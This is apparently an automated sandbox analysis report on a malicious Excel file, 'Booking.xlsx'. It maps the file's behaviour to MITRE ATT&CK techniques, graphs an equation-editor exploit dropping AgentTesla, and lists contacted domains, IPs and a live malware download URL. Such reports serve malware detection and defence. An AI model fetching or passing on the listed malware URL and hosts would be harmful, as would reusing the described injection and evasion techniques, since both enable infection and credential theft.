              Source: Yara matchFile source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Spearphishing Link1Windows Management Instrumentation1Path InterceptionExtra Window Memory Injection1Disable or Modify Tools1Credential API Hooking1System Network Connections Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer14Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsShared Modules1Boot or Logon Initialization ScriptsProcess Injection612Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information42Security Account ManagerSystem Information Discovery113SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSSecurity Software Discovery431Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsVirtualization/Sandbox Evasion14SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonRootkit1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading121DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion14Proc FilesystemSystem Network Configuration Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection612/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 356846 Sample: Booking.xlsx Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus detection for URL or domain 2->62 64 19 other signatures 2->64 10 EQNEDT32.EXE 13 2->10         started        15 EXCEL.EXE 37 19 2->15         started        process3 dnsIp4 46 thdyworkfinerainbotm.dns.army 103.141.138.118, 49166, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->46 48 ow.ly 54.67.120.65, 49165, 80 AMAZON-02US United States 10->48 34 C:\Users\user\AppData\Local\...\svchost[1], PE32 10->34 dropped 36 C:\Users\Public\vbc.exe, PE32 10->36 dropped 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->76 17 vbc.exe 1 5 10->17         started        38 C:\Users\user\Desktop\~$Booking.xlsx, data 15->38 dropped file5 signatures6 process7 signatures8 50 Multi AV Scanner detection for dropped file 17->50 52 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 17->52 54 Tries to detect virtualization through RDTSC time measurements 17->54 56 Injects a PE file into a foreign processes 17->56 20 vbc.exe 17->20         started        23 vbc.exe 17->23         started        process9 signatures10 66 Modifies the context of a thread in another process (thread injection) 20->66 68 Maps a DLL or memory area into another process 20->68 70 Sample uses process hollowing technique 20->70 72 Queues an APC in another process (thread injection) 20->72 25 explorer.exe 20->25 injected process11 dnsIp12 40 tiwapay.com 81.169.145.165, 49168, 80 STRATOSTRATOAGDE Germany 25->40 42 jtelitetraining.com 160.153.136.3, 49167, 80 GODADDY-AMSDE United States 25->42 44 2 other IPs or domains 25->44 74 System process connects to network (likely due to code injection or exploit) 25->74 29 NETSTAT.EXE 25->29         started        signatures13 process14 signatures15 78 Modifies the context of a thread in another process (thread injection) 29->78 80 Maps a DLL or memory area into another process 29->80 82 Tries to detect virtualization through RDTSC time measurements 29->82 32 cmd.exe 29->32         started        process16

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Booking.xlsx23%ReversingLabsWin32.Exploit.CVE-2017-11882

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1]15%ReversingLabsWin32.Trojan.AgentTesla
              C:\Users\Public\vbc.exe15%ReversingLabsWin32.Trojan.AgentTesla

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              6.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.mercadolivre.com.br/0%URL Reputationsafe
              http://www.mercadolivre.com.br/0%URL Reputationsafe
              http://www.mercadolivre.com.br/0%URL Reputationsafe
              http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
              http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
              http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
              http://www.dailymail.co.uk/0%URL Reputationsafe
              http://www.dailymail.co.uk/0%URL Reputationsafe
              http://www.dailymail.co.uk/0%URL Reputationsafe
              http://www.iis.fhg.de/audioPA0%URL Reputationsafe
              http://www.iis.fhg.de/audioPA0%URL Reputationsafe
              http://www.iis.fhg.de/audioPA0%URL Reputationsafe
              http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
              http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
              http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
              http://qunect.com/download/QuNect.exeMOperation0%Avira URL Cloudsafe
              http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
              http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
              http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
              http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
              http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
              http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
              http://it.search.dada.net/favicon.ico0%URL Reputationsafe
              http://it.search.dada.net/favicon.ico0%URL Reputationsafe
              http://it.search.dada.net/favicon.ico0%URL Reputationsafe
              http://search.hanafos.com/favicon.ico0%URL Reputationsafe
              http://search.hanafos.com/favicon.ico0%URL Reputationsafe
              http://search.hanafos.com/favicon.ico0%URL Reputationsafe
              http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
              http://www.abril.com.br/favicon.ico0%URL Reputationsafe
              http://www.abril.com.br/favicon.ico0%URL Reputationsafe
              http://www.abril.com.br/favicon.ico0%URL Reputationsafe
              http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
              http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
              http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
              http://buscar.ozu.es/0%Avira URL Cloudsafe
              http://busca.igbusca.com.br/0%URL Reputationsafe
              http://busca.igbusca.com.br/0%URL Reputationsafe
              http://busca.igbusca.com.br/0%URL Reputationsafe
              http://search.auction.co.kr/0%URL Reputationsafe
              http://search.auction.co.kr/0%URL Reputationsafe
              http://search.auction.co.kr/0%URL Reputationsafe
              http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
              http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
              http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
              http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
              http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
              http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
              http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
              http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
              http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
              http://google.pchome.com.tw/0%URL Reputationsafe
              http://google.pchome.com.tw/0%URL Reputationsafe
              http://google.pchome.com.tw/0%URL Reputationsafe
              http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
              http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
              http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
              http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
              http://www.gmarket.co.kr/0%URL Reputationsafe
              http://www.gmarket.co.kr/0%URL Reputationsafe
              http://www.gmarket.co.kr/0%URL Reputationsafe
              http://searchresults.news.com.au/0%URL Reputationsafe
              http://searchresults.news.com.au/0%URL Reputationsafe
              http://searchresults.news.com.au/0%URL Reputationsafe
              http://www.asharqalawsat.com/0%URL Reputationsafe
              http://www.asharqalawsat.com/0%URL Reputationsafe
              http://www.asharqalawsat.com/0%URL Reputationsafe
              http://search.yahoo.co.jp0%URL Reputationsafe
              http://search.yahoo.co.jp0%URL Reputationsafe
              http://search.yahoo.co.jp0%URL Reputationsafe
              http://buscador.terra.es/0%URL Reputationsafe
              http://buscador.terra.es/0%URL Reputationsafe
              http://buscador.terra.es/0%URL Reputationsafe
              http://thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite100%Avira URL Cloudmalware
              http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
              http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
              http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
              http://www.iask.com/0%URL Reputationsafe
              http://www.iask.com/0%URL Reputationsafe
              http://www.iask.com/0%URL Reputationsafe
              http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
              http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
              http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
              http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
              http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
              http://service2.bfast.com/0%URL Reputationsafe
              http://service2.bfast.com/0%URL Reputationsafe
              http://service2.bfast.com/0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.news.com.au/favicon.ico0%URL Reputationsafe
              http://www.news.com.au/favicon.ico0%URL Reputationsafe
              http://www.news.com.au/favicon.ico0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ow.ly
              54.67.120.65
              truefalse
                high
                jtelitetraining.com
                160.153.136.3
                truetrue
                  unknown
                  thdyworkfinerainbotm.dns.army
                  103.141.138.118
                  truefalse
                    unknown
                    tiwapay.com
                    81.169.145.165
                    truetrue
                      unknown
                      www.jtelitetraining.com
                      unknown
                      unknowntrue
                        unknown
                        www.tiwapay.com
                        unknown
                        unknowntrue
                          unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuitetrue
                          • Avira URL Cloud: malware
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://search.chol.com/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                            high
                            http://www.mercadolivre.com.br/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://search.ebay.de/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                              high
                              http://www.mtv.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://www.rambler.ru/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://www.nifty.com/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://www.dailymail.co.uk/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www3.fnac.com/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://buscar.ya.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://search.yahoo.com/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://www.iis.fhg.de/audioPAexplorer.exe, 00000007.00000000.2194501309.0000000004B50000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sogou.com/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://asp.usatoday.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://fr.search.yahoo.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://rover.ebay.comexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://in.search.yahoo.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://search.ebay.in/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://validator.w3.org/check?uri=referervbc.exe, vbc.exe, 00000005.00000000.2173313353.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2218672810.0000000000CF2000.00000020.00020000.sdmpfalse
                                                          high
                                                          http://msk.afisha.ru/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://qunect.com/download/QuNect.exeMOperationvbc.exe, 00000004.00000002.2181150885.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2173313353.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2218672810.0000000000CF2000.00000020.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://search.rediff.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://www.ya.com/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://it.search.dada.net/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://search.naver.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://www.google.ru/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://search.hanafos.com/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.abril.com.br/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://search.daum.net/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://search.naver.com/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.clarin.com/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://buscar.ozu.es/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://kr.search.yahoo.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://search.about.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://busca.igbusca.com.br/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://www.ask.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.priceminister.com/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.cjmall.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://search.centrum.cz/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://suche.t-online.de/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.google.it/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://search.auction.co.kr/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.ceneo.pl/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.amazon.de/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.2200795359.000000000861C000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://sads.myspace.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://google.pchome.com.tw/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.rambler.ru/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://uk.search.yahoo.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://espanol.search.yahoo.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.ozu.es/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://search.sify.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://openimage.interpark.com/interpark.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://search.ebay.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.gmarket.co.kr/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://search.nifty.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://searchresults.news.com.au/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://www.google.si/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.google.cz/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.soso.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.univision.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://search.ebay.it/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.asharqalawsat.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://busca.orange.es/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.target.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://buscador.terra.es/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.iask.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.tesco.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://cgi.search.biglobe.ne.jp/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://search.seznam.cz/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://suche.freenet.de/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.interpark.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://search.espn.go.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.myspace.com/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://search.centrum.cz/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://p.zhongsou.com/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://service2.bfast.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
